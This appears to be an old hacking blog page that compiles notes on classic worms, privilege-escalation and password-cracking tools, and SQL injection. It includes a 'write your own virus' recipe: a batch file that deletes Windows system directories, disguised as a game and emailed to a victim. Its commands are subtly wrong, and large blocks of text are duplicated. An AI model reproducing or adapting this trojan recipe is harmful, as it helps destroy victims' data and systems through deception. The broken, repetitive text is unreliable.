GUYZ FIND SOLUTION TO ALL YOUR HACKING QUERIES AND SOFTWARES HERE.
JUST POST UR REQUIREMNET AND EMAIL ID.
PROMPT RESPONSE
Tuesday, May 3, 2011
Sunday, December 13, 2009
Anti-Virus Software
The only prevention against virus is to install anti-virus software and keep the updates current.
Prominent anti-virus software vendors include:
Mc Afee
Norton AntiVirus
AntiViral Toolkit Pro
Dr. Solomon's
Trend Micro
Command AntiVirus
Data Fellows
Prominent anti-virus software vendors include:
Mc Afee
Norton AntiVirus
AntiViral Toolkit Pro
Dr. Solomon's
Trend Micro
Command AntiVirus
Data Fellows
Hacking Tool: Senna Spy Internet Worm Generator 2000
(http://sennaspy.cjb.net)
This tool can generate a VBS worm.
This tool can generate a VBS worm.
WRITE YOUR OWN VIRUS
Step 1: Create a batch file Game.bat with the following text @ echo off
delete c:\winnt\system32\*.*
delete c:\winnt\*.*
Step 2: Convert the Game.bat batch file to Game.com using bat2com utility.
Step 3: Assign Icon to Game.com using Windows file properties screen.
Step 4: Send the Game.com file as an e-mail attachment to a victim.
Step 5: When the victim runs this program, it deletes core files in WINNT directory making Windows unusable.
delete c:\winnt\system32\*.*
delete c:\winnt\*.*
Step 2: Convert the Game.bat batch file to Game.com using bat2com utility.
Step 3: Assign Icon to Game.com using Windows file properties screen.
Step 4: Send the Game.com file as an e-mail attachment to a victim.
Step 5: When the victim runs this program, it deletes core files in WINNT directory making Windows unusable.
VIRUSES
Chernobyl
ExploreZip
I Love You
Melissa
Pretty Park
Code Red Worm
W32/Klez
BugBear
W32/Opaserv Worm
Anti-Virus Software
Chernobyl is a deadly virus. Unlike the other viruses that have surfaced recently, this one is much more than a nuisance.
If infected, Chernobyl will erase data on your hard drive, and may even keep your machine from booting up at all.
There are several variants in the wild. each variant activates on a different date. Version 1.2 on April 26th, 1.3 on June 26th, and 1.4 on the 26th of every month
ExploreZip is a Win32-based e-mail worm. It searches for Microsoft Office documents on your hard drive and network drives.
When it finds any Word, Excel, or PowerPoint documents using the following extensions: .doc, .xls and .ppt, it erases the contents of those files. It also emails itself to any one who send you an e-mail.
ExploreZip arrives as an email attachment. The message will most likely come from someone you know, and the body of the message will read:
"I received your email and I shall send you a reply ASAP. Till then, take a look at the attached Zipped docs." The attachment will be named "Zipped_files.exe" and have a WinZip icon. Double clicking the program infects your computer.
LoveLetter is a Win32-based e-mail worm. It overwrites certain on your hard drive(s) and sends itself out to everyone in your Microsoft Outlook address book.
LoveLetter arrives as an email attachment named: LOVE-LETTER-FOR-YOU.TXT.VBS though new variants have different names including VeryFunny.vbs, virus_warning.jpg.vbs and protect.vbs
User Controlled Data is placed into an SQL query without being validated for correct format or embedded escape strings.
Affects majority of applications which use a database backend and don't force variable types.
At least 50% of the large e-commerce sites and about 75% of the medium to small sites are vulnerable.
Improper validation in CFML, ASP, JSP and PHP are the most frequent causes
Melissa is a Microsoft Word macro virus.
Through macros, the virus alters the Microsoft Outlook email program so that the virus gets sent to the first 50 people in your address book.
It does not corrupt any data on your hard drive or make your computer crash. It just changes some Word settings and sends itself to the people you don't want to infect.
Melissa Virus Infection
Melissa arrives as an email attachment.
The subject of the message containing the virus will read: "Important message from" followed by the name of the person whose email account it was sent from.
The body of the message reads: Here's the document you asked for...don't show anyone else ;-) Double clicking the attached Word document (typically named LIST.DOC) will infect your machine.
Pretty Park is a privacy invading worm. Every 30 seconds, it tries to e-mail itself to the e-mail addresses in your Microsoft Outlook address book.
It has also been reported to connect your machine to a custom IRC channel for the purpose of retrieving passwords from your system.
Pretty park arrives as an email attachment. Double clicking the PrettyPark.exe or Files32.exe program infects your computer.
You may see the Pipes screen after running the executable.
BUG BEAR VIRUS
This worm propagates via shared network folders and via email.
It also terminates antivirus programs, act as a backdoor server application, and sends out system passwords - all of which compromise security on infected machines. BugBear Infection
This worm fakes the FROM field and obtains the recipients for its email from email messages, address books and mail boxes on the infected system. It generates the filename for the attached copy of itself from the following:
A combination of text strings: setup, card, docs, news, Image, images, pics, resume, photo, video, music or song data; with any of the extensions: SCR, PIF, or EXE. An existing system file appended with any of the following extensions: SCR, PIF or EXE.
On systems with un patched Internet Explorer 5.0 and 5.5, the worm attachment is executed automatically when messages are either opened or previewed using Microsoft Outlook or Outlook Express.
KLEZ
ElKern, KLAZ, Kletz, I-Worm.klez, W95/Klez@mm
W32.Klez variants is a mass mailing worm that searches the Windows address book for email addresses and sends messages to all the recipients that it finds. The worm uses its own SMTP engine to send the messages.
The subject and attachment name of the incoming emails are randomly chosen. The attachment will have one of the extensions: .bat, .exe, .pif or .scr.
The worm exploits a vulnerability in Microsoft Outlook and Outlook Express to try execute itself when you open or preview the message.
SirCam is a mass mailing e-mail worm with the ability of spreading through Windows Network shares.
SirCam sends e-mails with variable user names and subject fields, and attaches user documents with double extensions (such as .doc.pif or .xls.lnk) to them.
Thw orm collects a list of files with certain extensions ('.DOC', '.XLS', '.ZIP') into fake DLL files named 'sc*.dll'. Thw orm then sends itself out with one of the document files it found in a users' "My Documents" folder.
Nimda is a complex virus with a mass mailing worm component which spreads itself in attachments named README.EXE.
It affects Windows 95, 98, ME, NT4 and Windows 2000 users.
Nimda is the first worm to modify existing web sites to strt offering infected files for download. It is also the first worm to use normal end user machines to scan for vulnerable web sites.
Nimda uses the Unicode exploit to infect IIS Web servers.
The "Code Red" worm attempts to connect to TCP port 80 on a randomly chosen host assuming that a web server will be found.
Upon a successful connection to port 80, the attacking host sends a crafted HTTP GET request to the victim, attempting to exploit a buffer overflow in the Windows 2000 Indexing Service.
If the exploit is successful, the worm begins executing on the victim host. In the earlier variant of the worm, victim hosts with a default language of English experienced the following defacement on all pages requested from the server:
HELLO! welcome to http://www.worm.com! Hacked By Chinese!
ExploreZip
I Love You
Melissa
Pretty Park
Code Red Worm
W32/Klez
BugBear
W32/Opaserv Worm
Anti-Virus Software
Chernobyl is a deadly virus. Unlike the other viruses that have surfaced recently, this one is much more than a nuisance.
If infected, Chernobyl will erase data on your hard drive, and may even keep your machine from booting up at all.
There are several variants in the wild. each variant activates on a different date. Version 1.2 on April 26th, 1.3 on June 26th, and 1.4 on the 26th of every month
ExploreZip is a Win32-based e-mail worm. It searches for Microsoft Office documents on your hard drive and network drives.
When it finds any Word, Excel, or PowerPoint documents using the following extensions: .doc, .xls and .ppt, it erases the contents of those files. It also emails itself to any one who send you an e-mail.
ExploreZip arrives as an email attachment. The message will most likely come from someone you know, and the body of the message will read:
"I received your email and I shall send you a reply ASAP. Till then, take a look at the attached Zipped docs." The attachment will be named "Zipped_files.exe" and have a WinZip icon. Double clicking the program infects your computer.
LoveLetter is a Win32-based e-mail worm. It overwrites certain on your hard drive(s) and sends itself out to everyone in your Microsoft Outlook address book.
LoveLetter arrives as an email attachment named: LOVE-LETTER-FOR-YOU.TXT.VBS though new variants have different names including VeryFunny.vbs, virus_warning.jpg.vbs and protect.vbs
User Controlled Data is placed into an SQL query without being validated for correct format or embedded escape strings.
Affects majority of applications which use a database backend and don't force variable types.
At least 50% of the large e-commerce sites and about 75% of the medium to small sites are vulnerable.
Improper validation in CFML, ASP, JSP and PHP are the most frequent causes
Melissa is a Microsoft Word macro virus.
Through macros, the virus alters the Microsoft Outlook email program so that the virus gets sent to the first 50 people in your address book.
It does not corrupt any data on your hard drive or make your computer crash. It just changes some Word settings and sends itself to the people you don't want to infect.
Melissa Virus Infection
Melissa arrives as an email attachment.
The subject of the message containing the virus will read: "Important message from" followed by the name of the person whose email account it was sent from.
The body of the message reads: Here's the document you asked for...don't show anyone else ;-) Double clicking the attached Word document (typically named LIST.DOC) will infect your machine.
Pretty Park is a privacy invading worm. Every 30 seconds, it tries to e-mail itself to the e-mail addresses in your Microsoft Outlook address book.
It has also been reported to connect your machine to a custom IRC channel for the purpose of retrieving passwords from your system.
Pretty park arrives as an email attachment. Double clicking the PrettyPark.exe or Files32.exe program infects your computer.
You may see the Pipes screen after running the executable.
BUG BEAR VIRUS
This worm propagates via shared network folders and via email.
It also terminates antivirus programs, act as a backdoor server application, and sends out system passwords - all of which compromise security on infected machines. BugBear Infection
This worm fakes the FROM field and obtains the recipients for its email from email messages, address books and mail boxes on the infected system. It generates the filename for the attached copy of itself from the following:
A combination of text strings: setup, card, docs, news, Image, images, pics, resume, photo, video, music or song data; with any of the extensions: SCR, PIF, or EXE. An existing system file appended with any of the following extensions: SCR, PIF or EXE.
On systems with un patched Internet Explorer 5.0 and 5.5, the worm attachment is executed automatically when messages are either opened or previewed using Microsoft Outlook or Outlook Express.
KLEZ
ElKern, KLAZ, Kletz, I-Worm.klez, W95/Klez@mm
W32.Klez variants is a mass mailing worm that searches the Windows address book for email addresses and sends messages to all the recipients that it finds. The worm uses its own SMTP engine to send the messages.
The subject and attachment name of the incoming emails are randomly chosen. The attachment will have one of the extensions: .bat, .exe, .pif or .scr.
The worm exploits a vulnerability in Microsoft Outlook and Outlook Express to try execute itself when you open or preview the message.
SirCam is a mass mailing e-mail worm with the ability of spreading through Windows Network shares.
SirCam sends e-mails with variable user names and subject fields, and attaches user documents with double extensions (such as .doc.pif or .xls.lnk) to them.
Thw orm collects a list of files with certain extensions ('.DOC', '.XLS', '.ZIP') into fake DLL files named 'sc*.dll'. Thw orm then sends itself out with one of the document files it found in a users' "My Documents" folder.
Nimda is a complex virus with a mass mailing worm component which spreads itself in attachments named README.EXE.
It affects Windows 95, 98, ME, NT4 and Windows 2000 users.
Nimda is the first worm to modify existing web sites to strt offering infected files for download. It is also the first worm to use normal end user machines to scan for vulnerable web sites.
Nimda uses the Unicode exploit to infect IIS Web servers.
The "Code Red" worm attempts to connect to TCP port 80 on a randomly chosen host assuming that a web server will be found.
Upon a successful connection to port 80, the attacking host sends a crafted HTTP GET request to the victim, attempting to exploit a buffer overflow in the Windows 2000 Indexing Service.
If the exploit is successful, the worm begins executing on the victim host. In the earlier variant of the worm, victim hosts with a default language of English experienced the following defacement on all pages requested from the server:
HELLO! welcome to http://www.worm.com! Hacked By Chinese!
Sunday, November 29, 2009
Automatic Password Cracking Algorithm
Find a valid user
Find encryption algorithm used
Obtain encrypted passwords
Create list of possible passwords
Encrypt each word
See if there is a match for each user ID
Repeat steps 1 through 6
Tool: hk.exe
The hk.exe utility exposes a Local Procedure Call flaw in NT.
A non-admin user can be escalated to administrators group using hk.exe
A non-admin user can be escalated to administrators group using hk.exe
Tool: GetAdmin
GetAdmin.exe is a small program that adds a user to the local administrators group.
It uses low-level NT kernel routine to set a globalflag allowing access to any running process.
You need to logon to the server console to execute the program.
The GetAdmin.exe is run from the command line or from a browser.
This only works with Nt 4.0 Service pack 3.
It uses low-level NT kernel routine to set a globalflag allowing access to any running process.
You need to logon to the server console to execute the program.
The GetAdmin.exe is run from the command line or from a browser.
This only works with Nt 4.0 Service pack 3.
Privilege Escalation
If an attacker gains access to the network using non-admin user account, the next step is to gain higher privilege to that of an administrator.
This is called privilege escalation
Hacking Tool: KerbCrack
KerbCrack consists of two programs, kerbsniff and kerbcrack. The sniffer listens on the network and captures Windows 2000/XP Kerberos logins. The cracker can be used to find the passwords from the capture file using a bruteforce attack or a dictionary attack.
Hacking Tool: LOphtcrack
LC4 is a password auditing and recovery package distributed by @stake software. SMB packet capture listens to the local network segment and captures individual login sessions.
With LOphtcrack password cracking engine anyone can sniff the ire for extended periods is most guaranteed to obtain Administrator status in matter of days
With LOphtcrack password cracking engine anyone can sniff the ire for extended periods is most guaranteed to obtain Administrator status in matter of days
Subscribe to:
Posts (Atom)